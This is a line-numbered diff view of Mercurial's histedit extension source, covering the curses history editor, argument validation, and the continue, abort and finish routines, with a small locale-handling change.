1629 if e in (E_PAGEDOWN, E_PAGEUP, E_LINEDOWN, E_LINEUP):
1628 if e in (E_PAGEDOWN, E_PAGEUP, E_LINEDOWN, E_LINEUP):
1630 if e == E_PAGEDOWN:
1629 if e == E_PAGEDOWN:
1631 changeview(state, +1, b'page')
1630 changeview(state, +1, b'page')
1632 elif e == E_PAGEUP:
1631 elif e == E_PAGEUP:
1633 changeview(state, -1, b'page')
1632 changeview(state, -1, b'page')
1634 elif e == E_LINEDOWN:
1633 elif e == E_LINEDOWN:
1635 changeview(state, +1, b'line')
1634 changeview(state, +1, b'line')
1636 elif e == E_LINEUP:
1635 elif e == E_LINEUP:
1637 changeview(state, -1, b'line')
1636 changeview(state, -1, b'line')
1638
1637
1639 # start rendering
1638 # start rendering
1640 commitwin.erase()
1639 commitwin.erase()
1641 helpwin.erase()
1640 helpwin.erase()
1642 mainwin.erase()
1641 mainwin.erase()
1643 if curmode == MODE_PATCH:
1642 if curmode == MODE_PATCH:
1644 renderpatch(mainwin, state)
1643 renderpatch(mainwin, state)
1645 elif curmode == MODE_HELP:
1644 elif curmode == MODE_HELP:
1646 renderstring(mainwin, state, __doc__.strip().splitlines())
1645 renderstring(mainwin, state, __doc__.strip().splitlines())
1647 else:
1646 else:
1648 renderrules(mainwin, state)
1647 renderrules(mainwin, state)
1649 rendercommit(commitwin, state)
1648 rendercommit(commitwin, state)
1650 renderhelp(helpwin, state)
1649 renderhelp(helpwin, state)
1651 curses.doupdate()
1650 curses.doupdate()
1652 # done rendering
1651 # done rendering
1653 ch = encoding.strtolocal(stdscr.getkey())
1652 ch = encoding.strtolocal(stdscr.getkey())
1654 except curses.error:
1653 except curses.error:
1655 pass
1654 pass
1656
1655
1657
1656
1658 def _chistedit(ui, repo, freeargs, opts):
1657 def _chistedit(ui, repo, freeargs, opts):
1659 """interactively edit changeset history via a curses interface
1658 """interactively edit changeset history via a curses interface
1660
1659
1661 Provides a ncurses interface to histedit. Press ? in chistedit mode
1660 Provides a ncurses interface to histedit. Press ? in chistedit mode
1662 to see an extensive help. Requires python-curses to be installed."""
1661 to see an extensive help. Requires python-curses to be installed."""
1663
1662
1664 if curses is None:
1663 if curses is None:
1665 raise error.Abort(_(b"Python curses library required"))
1664 raise error.Abort(_(b"Python curses library required"))
1666
1665
1667 # disable color
1666 # disable color
1668 ui._colormode = None
1667 ui._colormode = None
1669
1668
1670 try:
1669 try:
1671 keep = opts.get(b'keep')
1670 keep = opts.get(b'keep')
1672 revs = opts.get(b'rev', [])[:]
1671 revs = opts.get(b'rev', [])[:]
1673 cmdutil.checkunfinished(repo)
1672 cmdutil.checkunfinished(repo)
1674 cmdutil.bailifchanged(repo)
1673 cmdutil.bailifchanged(repo)
1675
1674
1676 if os.path.exists(os.path.join(repo.path, b'histedit-state')):
1675 if os.path.exists(os.path.join(repo.path, b'histedit-state')):
1677 raise error.Abort(
1676 raise error.Abort(
1678 _(
1677 _(
1679 b'history edit already in progress, try '
1678 b'history edit already in progress, try '
1680 b'--continue or --abort'
1679 b'--continue or --abort'
1681 )
1680 )
1682 )
1681 )
1683 revs.extend(freeargs)
1682 revs.extend(freeargs)
1684 if not revs:
1683 if not revs:
1685 defaultrev = destutil.desthistedit(ui, repo)
1684 defaultrev = destutil.desthistedit(ui, repo)
1686 if defaultrev is not None:
1685 if defaultrev is not None:
1687 revs.append(defaultrev)
1686 revs.append(defaultrev)
1688 if len(revs) != 1:
1687 if len(revs) != 1:
1689 raise error.Abort(
1688 raise error.Abort(
1690 _(b'histedit requires exactly one ancestor revision')
1689 _(b'histedit requires exactly one ancestor revision')
1691 )
1690 )
1692
1691
1693 rr = list(repo.set(b'roots(%ld)', scmutil.revrange(repo, revs)))
1692 rr = list(repo.set(b'roots(%ld)', scmutil.revrange(repo, revs)))
1694 if len(rr) != 1:
1693 if len(rr) != 1:
1695 raise error.Abort(
1694 raise error.Abort(
1696 _(
1695 _(
1697 b'The specified revisions must have '
1696 b'The specified revisions must have '
1698 b'exactly one common root'
1697 b'exactly one common root'
1699 )
1698 )
1700 )
1699 )
1701 root = rr[0].node()
1700 root = rr[0].node()
1702
1701
1703 topmost = repo.dirstate.p1()
1702 topmost = repo.dirstate.p1()
1704 revs = between(repo, root, topmost, keep)
1703 revs = between(repo, root, topmost, keep)
1705 if not revs:
1704 if not revs:
1706 raise error.Abort(
1705 raise error.Abort(
1707 _(b'%s is not an ancestor of working directory')
1706 _(b'%s is not an ancestor of working directory')
1708 % node.short(root)
1707 % node.short(root)
1709 )
1708 )
1710
1709
1711 ctxs = []
1710 ctxs = []
1712 for i, r in enumerate(revs):
1711 for i, r in enumerate(revs):
1713 ctxs.append(histeditrule(ui, repo[r], i))
1712 ctxs.append(histeditrule(ui, repo[r], i))
1714 # Curses requires setting the locale or it will default to the C
1713 with util.with_lc_ctype():
1715 # locale. This sets the locale to the user's default system
1714 rc = curses.wrapper(functools.partial(_chisteditmain, repo, ctxs))
1716 # locale.
1717 locale.setlocale(locale.LC_ALL, '')
1718 rc = curses.wrapper(functools.partial(_chisteditmain, repo, ctxs))
1719 curses.echo()
1715 curses.echo()
1720 curses.endwin()
1716 curses.endwin()
1721 if rc is False:
1717 if rc is False:
1722 ui.write(_(b"histedit aborted\n"))
1718 ui.write(_(b"histedit aborted\n"))
1723 return 0
1719 return 0
1724 if type(rc) is list:
1720 if type(rc) is list:
1725 ui.status(_(b"performing changes\n"))
1721 ui.status(_(b"performing changes\n"))
1726 rules = makecommands(rc)
1722 rules = makecommands(rc)
1727 with repo.vfs(b'chistedit', b'w+') as fp:
1723 with repo.vfs(b'chistedit', b'w+') as fp:
1728 for r in rules:
1724 for r in rules:
1729 fp.write(r)
1725 fp.write(r)
1730 opts[b'commands'] = fp.name
1726 opts[b'commands'] = fp.name
1731 return _texthistedit(ui, repo, freeargs, opts)
1727 return _texthistedit(ui, repo, freeargs, opts)
1732 except KeyboardInterrupt:
1728 except KeyboardInterrupt:
1733 pass
1729 pass
1734 return -1
1730 return -1
1735
1731
1736
1732
1737 @command(
1733 @command(
1738 b'histedit',
1734 b'histedit',
1739 [
1735 [
1740 (
1736 (
1741 b'',
1737 b'',
1742 b'commands',
1738 b'commands',
1743 b'',
1739 b'',
1744 _(b'read history edits from the specified file'),
1740 _(b'read history edits from the specified file'),
1745 _(b'FILE'),
1741 _(b'FILE'),
1746 ),
1742 ),
1747 (b'c', b'continue', False, _(b'continue an edit already in progress')),
1743 (b'c', b'continue', False, _(b'continue an edit already in progress')),
1748 (b'', b'edit-plan', False, _(b'edit remaining actions list')),
1744 (b'', b'edit-plan', False, _(b'edit remaining actions list')),
1749 (
1745 (
1750 b'k',
1746 b'k',
1751 b'keep',
1747 b'keep',
1752 False,
1748 False,
1753 _(b"don't strip old nodes after edit is complete"),
1749 _(b"don't strip old nodes after edit is complete"),
1754 ),
1750 ),
1755 (b'', b'abort', False, _(b'abort an edit in progress')),
1751 (b'', b'abort', False, _(b'abort an edit in progress')),
1756 (b'o', b'outgoing', False, _(b'changesets not found in destination')),
1752 (b'o', b'outgoing', False, _(b'changesets not found in destination')),
1757 (
1753 (
1758 b'f',
1754 b'f',
1759 b'force',
1755 b'force',
1760 False,
1756 False,
1761 _(b'force outgoing even for unrelated repositories'),
1757 _(b'force outgoing even for unrelated repositories'),
1762 ),
1758 ),
1763 (b'r', b'rev', [], _(b'first revision to be edited'), _(b'REV')),
1759 (b'r', b'rev', [], _(b'first revision to be edited'), _(b'REV')),
1764 ]
1760 ]
1765 + cmdutil.formatteropts,
1761 + cmdutil.formatteropts,
1766 _(b"[OPTIONS] ([ANCESTOR] | --outgoing [URL])"),
1762 _(b"[OPTIONS] ([ANCESTOR] | --outgoing [URL])"),
1767 helpcategory=command.CATEGORY_CHANGE_MANAGEMENT,
1763 helpcategory=command.CATEGORY_CHANGE_MANAGEMENT,
1768 )
1764 )
1769 def histedit(ui, repo, *freeargs, **opts):
1765 def histedit(ui, repo, *freeargs, **opts):
1770 """interactively edit changeset history
1766 """interactively edit changeset history
1771
1767
1772 This command lets you edit a linear series of changesets (up to
1768 This command lets you edit a linear series of changesets (up to
1773 and including the working directory, which should be clean).
1769 and including the working directory, which should be clean).
1774 You can:
1770 You can:
1775
1771
1776 - `pick` to [re]order a changeset
1772 - `pick` to [re]order a changeset
1777
1773
1778 - `drop` to omit changeset
1774 - `drop` to omit changeset
1779
1775
1780 - `mess` to reword the changeset commit message
1776 - `mess` to reword the changeset commit message
1781
1777
1782 - `fold` to combine it with the preceding changeset (using the later date)
1778 - `fold` to combine it with the preceding changeset (using the later date)
1783
1779
1784 - `roll` like fold, but discarding this commit's description and date
1780 - `roll` like fold, but discarding this commit's description and date
1785
1781
1786 - `edit` to edit this changeset (preserving date)
1782 - `edit` to edit this changeset (preserving date)
1787
1783
1788 - `base` to checkout changeset and apply further changesets from there
1784 - `base` to checkout changeset and apply further changesets from there
1789
1785
1790 There are a number of ways to select the root changeset:
1786 There are a number of ways to select the root changeset:
1791
1787
1792 - Specify ANCESTOR directly
1788 - Specify ANCESTOR directly
1793
1789
1794 - Use --outgoing -- it will be the first linear changeset not
1790 - Use --outgoing -- it will be the first linear changeset not
1795 included in destination. (See :hg:`help config.paths.default-push`)
1791 included in destination. (See :hg:`help config.paths.default-push`)
1796
1792
1797 - Otherwise, the value from the "histedit.defaultrev" config option
1793 - Otherwise, the value from the "histedit.defaultrev" config option
1798 is used as a revset to select the base revision when ANCESTOR is not
1794 is used as a revset to select the base revision when ANCESTOR is not
1799 specified. The first revision returned by the revset is used. By
1795 specified. The first revision returned by the revset is used. By
1800 default, this selects the editable history that is unique to the
1796 default, this selects the editable history that is unique to the
1801 ancestry of the working directory.
1797 ancestry of the working directory.
1802
1798
1803 .. container:: verbose
1799 .. container:: verbose
1804
1800
1805 If you use --outgoing, this command will abort if there are ambiguous
1801 If you use --outgoing, this command will abort if there are ambiguous
1806 outgoing revisions. For example, if there are multiple branches
1802 outgoing revisions. For example, if there are multiple branches
1807 containing outgoing revisions.
1803 containing outgoing revisions.
1808
1804
1809 Use "min(outgoing() and ::.)" or similar revset specification
1805 Use "min(outgoing() and ::.)" or similar revset specification
1810 instead of --outgoing to specify edit target revision exactly in
1806 instead of --outgoing to specify edit target revision exactly in
1811 such ambiguous situation. See :hg:`help revsets` for detail about
1807 such ambiguous situation. See :hg:`help revsets` for detail about
1812 selecting revisions.
1808 selecting revisions.
1813
1809
1814 .. container:: verbose
1810 .. container:: verbose
1815
1811
1816 Examples:
1812 Examples:
1817
1813
1818 - A number of changes have been made.
1814 - A number of changes have been made.
1819 Revision 3 is no longer needed.
1815 Revision 3 is no longer needed.
1820
1816
1821 Start history editing from revision 3::
1817 Start history editing from revision 3::
1822
1818
1823 hg histedit -r 3
1819 hg histedit -r 3
1824
1820
1825 An editor opens, containing the list of revisions,
1821 An editor opens, containing the list of revisions,
1826 with specific actions specified::
1822 with specific actions specified::
1827
1823
1828 pick 5339bf82f0ca 3 Zworgle the foobar
1824 pick 5339bf82f0ca 3 Zworgle the foobar
1829 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1825 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1830 pick 0a9639fcda9d 5 Morgify the cromulancy
1826 pick 0a9639fcda9d 5 Morgify the cromulancy
1831
1827
1832 Additional information about the possible actions
1828 Additional information about the possible actions
1833 to take appears below the list of revisions.
1829 to take appears below the list of revisions.
1834
1830
1835 To remove revision 3 from the history,
1831 To remove revision 3 from the history,
1836 its action (at the beginning of the relevant line)
1832 its action (at the beginning of the relevant line)
1837 is changed to 'drop'::
1833 is changed to 'drop'::
1838
1834
1839 drop 5339bf82f0ca 3 Zworgle the foobar
1835 drop 5339bf82f0ca 3 Zworgle the foobar
1840 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1836 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1841 pick 0a9639fcda9d 5 Morgify the cromulancy
1837 pick 0a9639fcda9d 5 Morgify the cromulancy
1842
1838
1843 - A number of changes have been made.
1839 - A number of changes have been made.
1844 Revision 2 and 4 need to be swapped.
1840 Revision 2 and 4 need to be swapped.
1845
1841
1846 Start history editing from revision 2::
1842 Start history editing from revision 2::
1847
1843
1848 hg histedit -r 2
1844 hg histedit -r 2
1849
1845
1850 An editor opens, containing the list of revisions,
1846 An editor opens, containing the list of revisions,
1851 with specific actions specified::
1847 with specific actions specified::
1852
1848
1853 pick 252a1af424ad 2 Blorb a morgwazzle
1849 pick 252a1af424ad 2 Blorb a morgwazzle
1854 pick 5339bf82f0ca 3 Zworgle the foobar
1850 pick 5339bf82f0ca 3 Zworgle the foobar
1855 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1851 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1856
1852
1857 To swap revision 2 and 4, its lines are swapped
1853 To swap revision 2 and 4, its lines are swapped
1858 in the editor::
1854 in the editor::
1859
1855
1860 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1856 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1861 pick 5339bf82f0ca 3 Zworgle the foobar
1857 pick 5339bf82f0ca 3 Zworgle the foobar
1862 pick 252a1af424ad 2 Blorb a morgwazzle
1858 pick 252a1af424ad 2 Blorb a morgwazzle
1863
1859
1864 Returns 0 on success, 1 if user intervention is required (not only
1860 Returns 0 on success, 1 if user intervention is required (not only
1865 for intentional "edit" command, but also for resolving unexpected
1861 for intentional "edit" command, but also for resolving unexpected
1866 conflicts).
1862 conflicts).
1867 """
1863 """
1868 opts = pycompat.byteskwargs(opts)
1864 opts = pycompat.byteskwargs(opts)
1869
1865
1870 # kludge: _chistedit only works for starting an edit, not aborting
1866 # kludge: _chistedit only works for starting an edit, not aborting
1871 # or continuing, so fall back to regular _texthistedit for those
1867 # or continuing, so fall back to regular _texthistedit for those
1872 # operations.
1868 # operations.
1873 if ui.interface(b'histedit') == b'curses' and _getgoal(opts) == goalnew:
1869 if ui.interface(b'histedit') == b'curses' and _getgoal(opts) == goalnew:
1874 return _chistedit(ui, repo, freeargs, opts)
1870 return _chistedit(ui, repo, freeargs, opts)
1875 return _texthistedit(ui, repo, freeargs, opts)
1871 return _texthistedit(ui, repo, freeargs, opts)
1876
1872
1877
1873
1878 def _texthistedit(ui, repo, freeargs, opts):
1874 def _texthistedit(ui, repo, freeargs, opts):
1879 state = histeditstate(repo)
1875 state = histeditstate(repo)
1880 with repo.wlock() as wlock, repo.lock() as lock:
1876 with repo.wlock() as wlock, repo.lock() as lock:
1881 state.wlock = wlock
1877 state.wlock = wlock
1882 state.lock = lock
1878 state.lock = lock
1883 _histedit(ui, repo, state, freeargs, opts)
1879 _histedit(ui, repo, state, freeargs, opts)
1884
1880
1885
1881
1886 goalcontinue = b'continue'
1882 goalcontinue = b'continue'
1887 goalabort = b'abort'
1883 goalabort = b'abort'
1888 goaleditplan = b'edit-plan'
1884 goaleditplan = b'edit-plan'
1889 goalnew = b'new'
1885 goalnew = b'new'
1890
1886
1891
1887
1892 def _getgoal(opts):
1888 def _getgoal(opts):
1893 if opts.get(b'continue'):
1889 if opts.get(b'continue'):
1894 return goalcontinue
1890 return goalcontinue
1895 if opts.get(b'abort'):
1891 if opts.get(b'abort'):
1896 return goalabort
1892 return goalabort
1897 if opts.get(b'edit_plan'):
1893 if opts.get(b'edit_plan'):
1898 return goaleditplan
1894 return goaleditplan
1899 return goalnew
1895 return goalnew
1900
1896
1901
1897
1902 def _readfile(ui, path):
1898 def _readfile(ui, path):
1903 if path == b'-':
1899 if path == b'-':
1904 with ui.timeblockedsection(b'histedit'):
1900 with ui.timeblockedsection(b'histedit'):
1905 return ui.fin.read()
1901 return ui.fin.read()
1906 else:
1902 else:
1907 with open(path, b'rb') as f:
1903 with open(path, b'rb') as f:
1908 return f.read()
1904 return f.read()
1909
1905
1910
1906
1911 def _validateargs(ui, repo, state, freeargs, opts, goal, rules, revs):
1907 def _validateargs(ui, repo, state, freeargs, opts, goal, rules, revs):
1912 # TODO only abort if we try to histedit mq patches, not just
1908 # TODO only abort if we try to histedit mq patches, not just
1913 # blanket if mq patches are applied somewhere
1909 # blanket if mq patches are applied somewhere
1914 mq = getattr(repo, 'mq', None)
1910 mq = getattr(repo, 'mq', None)
1915 if mq and mq.applied:
1911 if mq and mq.applied:
1916 raise error.Abort(_(b'source has mq patches applied'))
1912 raise error.Abort(_(b'source has mq patches applied'))
1917
1913
1918 # basic argument incompatibility processing
1914 # basic argument incompatibility processing
1919 outg = opts.get(b'outgoing')
1915 outg = opts.get(b'outgoing')
1920 editplan = opts.get(b'edit_plan')
1916 editplan = opts.get(b'edit_plan')
1921 abort = opts.get(b'abort')
1917 abort = opts.get(b'abort')
1922 force = opts.get(b'force')
1918 force = opts.get(b'force')
1923 if force and not outg:
1919 if force and not outg:
1924 raise error.Abort(_(b'--force only allowed with --outgoing'))
1920 raise error.Abort(_(b'--force only allowed with --outgoing'))
1925 if goal == b'continue':
1921 if goal == b'continue':
1926 if any((outg, abort, revs, freeargs, rules, editplan)):
1922 if any((outg, abort, revs, freeargs, rules, editplan)):
1927 raise error.Abort(_(b'no arguments allowed with --continue'))
1923 raise error.Abort(_(b'no arguments allowed with --continue'))
1928 elif goal == b'abort':
1924 elif goal == b'abort':
1929 if any((outg, revs, freeargs, rules, editplan)):
1925 if any((outg, revs, freeargs, rules, editplan)):
1930 raise error.Abort(_(b'no arguments allowed with --abort'))
1926 raise error.Abort(_(b'no arguments allowed with --abort'))
1931 elif goal == b'edit-plan':
1927 elif goal == b'edit-plan':
1932 if any((outg, revs, freeargs)):
1928 if any((outg, revs, freeargs)):
1933 raise error.Abort(
1929 raise error.Abort(
1934 _(b'only --commands argument allowed with --edit-plan')
1930 _(b'only --commands argument allowed with --edit-plan')
1935 )
1931 )
1936 else:
1932 else:
1937 if state.inprogress():
1933 if state.inprogress():
1938 raise error.Abort(
1934 raise error.Abort(
1939 _(
1935 _(
1940 b'history edit already in progress, try '
1936 b'history edit already in progress, try '
1941 b'--continue or --abort'
1937 b'--continue or --abort'
1942 )
1938 )
1943 )
1939 )
1944 if outg:
1940 if outg:
1945 if revs:
1941 if revs:
1946 raise error.Abort(_(b'no revisions allowed with --outgoing'))
1942 raise error.Abort(_(b'no revisions allowed with --outgoing'))
1947 if len(freeargs) > 1:
1943 if len(freeargs) > 1:
1948 raise error.Abort(
1944 raise error.Abort(
1949 _(b'only one repo argument allowed with --outgoing')
1945 _(b'only one repo argument allowed with --outgoing')
1950 )
1946 )
1951 else:
1947 else:
1952 revs.extend(freeargs)
1948 revs.extend(freeargs)
1953 if len(revs) == 0:
1949 if len(revs) == 0:
1954 defaultrev = destutil.desthistedit(ui, repo)
1950 defaultrev = destutil.desthistedit(ui, repo)
1955 if defaultrev is not None:
1951 if defaultrev is not None:
1956 revs.append(defaultrev)
1952 revs.append(defaultrev)
1957
1953
1958 if len(revs) != 1:
1954 if len(revs) != 1:
1959 raise error.Abort(
1955 raise error.Abort(
1960 _(b'histedit requires exactly one ancestor revision')
1956 _(b'histedit requires exactly one ancestor revision')
1961 )
1957 )
1962
1958
1963
1959
1964 def _histedit(ui, repo, state, freeargs, opts):
1960 def _histedit(ui, repo, state, freeargs, opts):
1965 fm = ui.formatter(b'histedit', opts)
1961 fm = ui.formatter(b'histedit', opts)
1966 fm.startitem()
1962 fm.startitem()
1967 goal = _getgoal(opts)
1963 goal = _getgoal(opts)
1968 revs = opts.get(b'rev', [])
1964 revs = opts.get(b'rev', [])
1969 nobackup = not ui.configbool(b'rewrite', b'backup-bundle')
1965 nobackup = not ui.configbool(b'rewrite', b'backup-bundle')
1970 rules = opts.get(b'commands', b'')
1966 rules = opts.get(b'commands', b'')
1971 state.keep = opts.get(b'keep', False)
1967 state.keep = opts.get(b'keep', False)
1972
1968
1973 _validateargs(ui, repo, state, freeargs, opts, goal, rules, revs)
1969 _validateargs(ui, repo, state, freeargs, opts, goal, rules, revs)
1974
1970
1975 hastags = False
1971 hastags = False
1976 if revs:
1972 if revs:
1977 revs = scmutil.revrange(repo, revs)
1973 revs = scmutil.revrange(repo, revs)
1978 ctxs = [repo[rev] for rev in revs]
1974 ctxs = [repo[rev] for rev in revs]
1979 for ctx in ctxs:
1975 for ctx in ctxs:
1980 tags = [tag for tag in ctx.tags() if tag != b'tip']
1976 tags = [tag for tag in ctx.tags() if tag != b'tip']
1981 if not hastags:
1977 if not hastags:
1982 hastags = len(tags)
1978 hastags = len(tags)
1983 if hastags:
1979 if hastags:
1984 if ui.promptchoice(
1980 if ui.promptchoice(
1985 _(
1981 _(
1986 b'warning: tags associated with the given'
1982 b'warning: tags associated with the given'
1987 b' changeset will be lost after histedit.\n'
1983 b' changeset will be lost after histedit.\n'
1988 b'do you want to continue (yN)? $$ &Yes $$ &No'
1984 b'do you want to continue (yN)? $$ &Yes $$ &No'
1989 ),
1985 ),
1990 default=1,
1986 default=1,
1991 ):
1987 ):
1992 raise error.Abort(_(b'histedit cancelled\n'))
1988 raise error.Abort(_(b'histedit cancelled\n'))
1993 # rebuild state
1989 # rebuild state
1994 if goal == goalcontinue:
1990 if goal == goalcontinue:
1995 state.read()
1991 state.read()
1996 state = bootstrapcontinue(ui, state, opts)
1992 state = bootstrapcontinue(ui, state, opts)
1997 elif goal == goaleditplan:
1993 elif goal == goaleditplan:
1998 _edithisteditplan(ui, repo, state, rules)
1994 _edithisteditplan(ui, repo, state, rules)
1999 return
1995 return
2000 elif goal == goalabort:
1996 elif goal == goalabort:
2001 _aborthistedit(ui, repo, state, nobackup=nobackup)
1997 _aborthistedit(ui, repo, state, nobackup=nobackup)
2002 return
1998 return
2003 else:
1999 else:
2004 # goal == goalnew
2000 # goal == goalnew
2005 _newhistedit(ui, repo, state, revs, freeargs, opts)
2001 _newhistedit(ui, repo, state, revs, freeargs, opts)
2006
2002
2007 _continuehistedit(ui, repo, state)
2003 _continuehistedit(ui, repo, state)
2008 _finishhistedit(ui, repo, state, fm)
2004 _finishhistedit(ui, repo, state, fm)
2009 fm.end()
2005 fm.end()
2010
2006
2011
2007
2012 def _continuehistedit(ui, repo, state):
2008 def _continuehistedit(ui, repo, state):
2013 """This function runs after either:
2009 """This function runs after either:
2014 - bootstrapcontinue (if the goal is 'continue')
2010 - bootstrapcontinue (if the goal is 'continue')
2015 - _newhistedit (if the goal is 'new')
2011 - _newhistedit (if the goal is 'new')
2016 """
2012 """
2017 # preprocess rules so that we can hide inner folds from the user
2013 # preprocess rules so that we can hide inner folds from the user
2018 # and only show one editor
2014 # and only show one editor
2019 actions = state.actions[:]
2015 actions = state.actions[:]
2020 for idx, (action, nextact) in enumerate(zip(actions, actions[1:] + [None])):
2016 for idx, (action, nextact) in enumerate(zip(actions, actions[1:] + [None])):
2021 if action.verb == b'fold' and nextact and nextact.verb == b'fold':
2017 if action.verb == b'fold' and nextact and nextact.verb == b'fold':
2022 state.actions[idx].__class__ = _multifold
2018 state.actions[idx].__class__ = _multifold
2023
2019
2024 # Force an initial state file write, so the user can run --abort/continue
2020 # Force an initial state file write, so the user can run --abort/continue
2025 # even if there's an exception before the first transaction serialize.
2021 # even if there's an exception before the first transaction serialize.
2026 state.write()
2022 state.write()
2027
2023
2028 tr = None
2024 tr = None
2029 # Don't use singletransaction by default since it rolls the entire
2025 # Don't use singletransaction by default since it rolls the entire
2030 # transaction back if an unexpected exception happens (like a
2026 # transaction back if an unexpected exception happens (like a
2031 # pretxncommit hook throws, or the user aborts the commit msg editor).
2027 # pretxncommit hook throws, or the user aborts the commit msg editor).
2032 if ui.configbool(b"histedit", b"singletransaction"):
2028 if ui.configbool(b"histedit", b"singletransaction"):
2033 # Don't use a 'with' for the transaction, since actions may close
2029 # Don't use a 'with' for the transaction, since actions may close
2034 # and reopen a transaction. For example, if the action executes an
2030 # and reopen a transaction. For example, if the action executes an
2035 # external process it may choose to commit the transaction first.
2031 # external process it may choose to commit the transaction first.
2036 tr = repo.transaction(b'histedit')
2032 tr = repo.transaction(b'histedit')
2037 progress = ui.makeprogress(
2033 progress = ui.makeprogress(
2038 _(b"editing"), unit=_(b'changes'), total=len(state.actions)
2034 _(b"editing"), unit=_(b'changes'), total=len(state.actions)
2039 )
2035 )
2040 with progress, util.acceptintervention(tr):
2036 with progress, util.acceptintervention(tr):
2041 while state.actions:
2037 while state.actions:
2042 state.write(tr=tr)
2038 state.write(tr=tr)
2043 actobj = state.actions[0]
2039 actobj = state.actions[0]
2044 progress.increment(item=actobj.torule())
2040 progress.increment(item=actobj.torule())
2045 ui.debug(
2041 ui.debug(
2046 b'histedit: processing %s %s\n' % (actobj.verb, actobj.torule())
2042 b'histedit: processing %s %s\n' % (actobj.verb, actobj.torule())
2047 )
2043 )
2048 parentctx, replacement_ = actobj.run()
2044 parentctx, replacement_ = actobj.run()
2049 state.parentctxnode = parentctx.node()
2045 state.parentctxnode = parentctx.node()
2050 state.replacements.extend(replacement_)
2046 state.replacements.extend(replacement_)
2051 state.actions.pop(0)
2047 state.actions.pop(0)
2052
2048
2053 state.write()
2049 state.write()
2054
2050
2055
2051
2056 def _finishhistedit(ui, repo, state, fm):
2052 def _finishhistedit(ui, repo, state, fm):
2057 """This action runs when histedit is finishing its session"""
2053 """This action runs when histedit is finishing its session"""
2058 hg.updaterepo(repo, state.parentctxnode, overwrite=False)
2054 hg.updaterepo(repo, state.parentctxnode, overwrite=False)
2059
2055
2060 mapping, tmpnodes, created, ntm = processreplacement(state)
2056 mapping, tmpnodes, created, ntm = processreplacement(state)
2061 if mapping:
2057 if mapping:
2062 for prec, succs in pycompat.iteritems(mapping):
2058 for prec, succs in pycompat.iteritems(mapping):
2063 if not succs:
2059 if not succs:
2064 ui.debug(b'histedit: %s is dropped\n' % node.short(prec))
2060 ui.debug(b'histedit: %s is dropped\n' % node.short(prec))
2065 else:
2061 else:
2066 ui.debug(
2062 ui.debug(
2067 b'histedit: %s is replaced by %s\n'
2063 b'histedit: %s is replaced by %s\n'
2068 % (node.short(prec), node.short(succs[0]))
2064 % (node.short(prec), node.short(succs[0]))
2069 )
2065 )
2070 if len(succs) > 1:
2066 if len(succs) > 1:
2071 m = b'histedit: %s'
2067 m = b'histedit: %s'
2072 for n in succs[1:]:
2068 for n in succs[1:]:
2073 ui.debug(m % node.short(n))
2069 ui.debug(m % node.short(n))
2074
2070
2075 if not state.keep:
2071 if not state.keep:
2076 if mapping:
2072 if mapping:
2077 movetopmostbookmarks(repo, state.topmost, ntm)
2073 movetopmostbookmarks(repo, state.topmost, ntm)
2078 # TODO update mq state
2074 # TODO update mq state
2079 else:
2075 else:
2080 mapping = {}
2076 mapping = {}
2081
2077
2082 for n in tmpnodes:
2078 for n in tmpnodes:
2083 if n in repo:
2079 if n in repo:
2084 mapping[n] = ()
2080 mapping[n] = ()
2085
2081
2086 # remove entries about unknown nodes
2082 # remove entries about unknown nodes
2087 has_node = repo.unfiltered().changelog.index.has_node
2083 has_node = repo.unfiltered().changelog.index.has_node
2088 mapping = {
2084 mapping = {
2089 k: v
2085 k: v
2090 for k, v in mapping.items()
2086 for k, v in mapping.items()
2091 if has_node(k) and all(has_node(n) for n in v)
2087 if has_node(k) and all(has_node(n) for n in v)
2092 }
2088 }
2093 scmutil.cleanupnodes(repo, mapping, b'histedit')
2089 scmutil.cleanupnodes(repo, mapping, b'histedit')
2094 hf = fm.hexfunc
2090 hf = fm.hexfunc
2095 fl = fm.formatlist
2091 fl = fm.formatlist
2096 fd = fm.formatdict
2092 fd = fm.formatdict
2097 nodechanges = fd(
2093 nodechanges = fd(
2098 {
2094 {
2099 hf(oldn): fl([hf(n) for n in newn], name=b'node')
2095 hf(oldn): fl([hf(n) for n in newn], name=b'node')
2100 for oldn, newn in pycompat.iteritems(mapping)
2096 for oldn, newn in pycompat.iteritems(mapping)
2101 },
2097 },
2102 key=b"oldnode",
2098 key=b"oldnode",
2103 value=b"newnodes",
2099 value=b"newnodes",
2104 )
2100 )
2105 fm.data(nodechanges=nodechanges)
2101 fm.data(nodechanges=nodechanges)
2106
2102
2107 state.clear()
2103 state.clear()
2108 if os.path.exists(repo.sjoin(b'undo')):
2104 if os.path.exists(repo.sjoin(b'undo')):
2109 os.unlink(repo.sjoin(b'undo'))
2105 os.unlink(repo.sjoin(b'undo'))
2110 if repo.vfs.exists(b'histedit-last-edit.txt'):
2106 if repo.vfs.exists(b'histedit-last-edit.txt'):
2111 repo.vfs.unlink(b'histedit-last-edit.txt')
2107 repo.vfs.unlink(b'histedit-last-edit.txt')
2112
2108
2113
2109
2114 def _aborthistedit(ui, repo, state, nobackup=False):
2110 def _aborthistedit(ui, repo, state, nobackup=False):
2115 try:
2111 try:
2116 state.read()
2112 state.read()
2117 __, leafs, tmpnodes, __ = processreplacement(state)
2113 __, leafs, tmpnodes, __ = processreplacement(state)
2118 ui.debug(b'restore wc to old parent %s\n' % node.short(state.topmost))
2114 ui.debug(b'restore wc to old parent %s\n' % node.short(state.topmost))
2119
2115
2120 # Recover our old commits if necessary
2116 # Recover our old commits if necessary
2121 if not state.topmost in repo and state.backupfile:
2117 if not state.topmost in repo and state.backupfile:
2122 backupfile = repo.vfs.join(state.backupfile)
2118 backupfile = repo.vfs.join(state.backupfile)
2123 f = hg.openpath(ui, backupfile)
2119 f = hg.openpath(ui, backupfile)
2124 gen = exchange.readbundle(ui, f, backupfile)
2120 gen = exchange.readbundle(ui, f, backupfile)
2125 with repo.transaction(b'histedit.abort') as tr:
2121 with repo.transaction(b'histedit.abort') as tr:
2126 bundle2.applybundle(
2122 bundle2.applybundle(
2127 repo,
2123 repo,
2128 gen,
2124 gen,
2129 tr,
2125 tr,
2130 source=b'histedit',
2126 source=b'histedit',
2131 url=b'bundle:' + backupfile,
2127 url=b'bundle:' + backupfile,
2132 )
2128 )
